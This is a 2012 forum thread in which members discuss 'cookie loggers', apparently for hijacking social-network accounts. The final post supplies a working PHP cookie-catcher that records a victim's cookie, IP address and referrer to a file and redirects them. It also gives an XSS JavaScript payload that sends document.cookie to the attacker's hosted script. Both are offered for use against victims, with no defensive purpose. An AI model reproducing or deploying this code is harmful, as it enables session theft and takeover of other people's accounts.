cookie logger

Discussion in 'Social Networking Sites' started by Finnishhacker, Feb 11, 2012.

  1. Finnishhacker

    Finnishhacker Junior Member

    Joined:
    Dec 25, 2011
    Messages:
    137
    Likes Received:
    11
    Anyone has knowledge about cookie loggers ??
     
  2. tsree

    tsree Newbie

    Joined:
    Sep 24, 2011
    Messages:
    32
    Likes Received:
    2
    What are you meant by cookie logger?
     
  3. Finnishhacker

    Finnishhacker Junior Member

    Joined:
    Dec 25, 2011
    Messages:
    137
    Likes Received:
    11

    if you dont even know what it is dont bother asking.....search on google. I need someone who knows about the topic :D
     
  4. No.RuleZ

    No.RuleZ BANNED BANNED

    Joined:
    Jul 23, 2010
    Messages:
    1,746
    Likes Received:
    362
    fb cookie logger?
     
  5. dgruergerugerhiye

    dgruergerugerhiye BANNED BANNED

    Joined:
    Nov 4, 2010
    Messages:
    305
    Likes Received:
    453
    I found this is 2 seconds from googling...

    PHP:
    <?php 
    $cookie 
    $_GET['c']; //This obtains a value of variable c in url passed by GET method of HTTP and stores it in $cookie  

    $ip getenv ('REMOTE_ADDR'); // Gets the value of an environment variable which denotes the IP of client and stores it in $ip  

    $date date ("j F, Y, g:i a"); //Records the Date and Time of capture 

    $referer getenv ('HTTP_REFERER'); //Gets the value of an environment variable which denotes the site which redirected to your cookie catcher and stores it in $referer 

    $fp fopen ('cookies.html','a'); //opening a file cookies.html in append mode in which details will be stored 

    fwrite ($fp'Cookie :'.$cookie.'<br/> IP :'.$ip.'<br/> Date and Time :'.$date.'<br/> Referer : '.$referer); //passing the reference of file cookies.html and passing the rest of the details we obtained 

    fclose ($fp); //closing the file reference  

    header ('Location: http://www.siteYouWantToRedirectTheVictimTo.com/'); //Redirecting the client back to page you wish  

    ?>


    Now all you have to ensure is that you force the client to send the cookie in a variable called c over the GET method ...

    For example if you find an XSS , you may inject this javascript which will will do the above

    HTML:
    <script>document.location="www.thePlaceWhereYouUploadedYourCookieCatcher.php?c=" + document.cookie</script>
     
    • Thanks Thanks x 1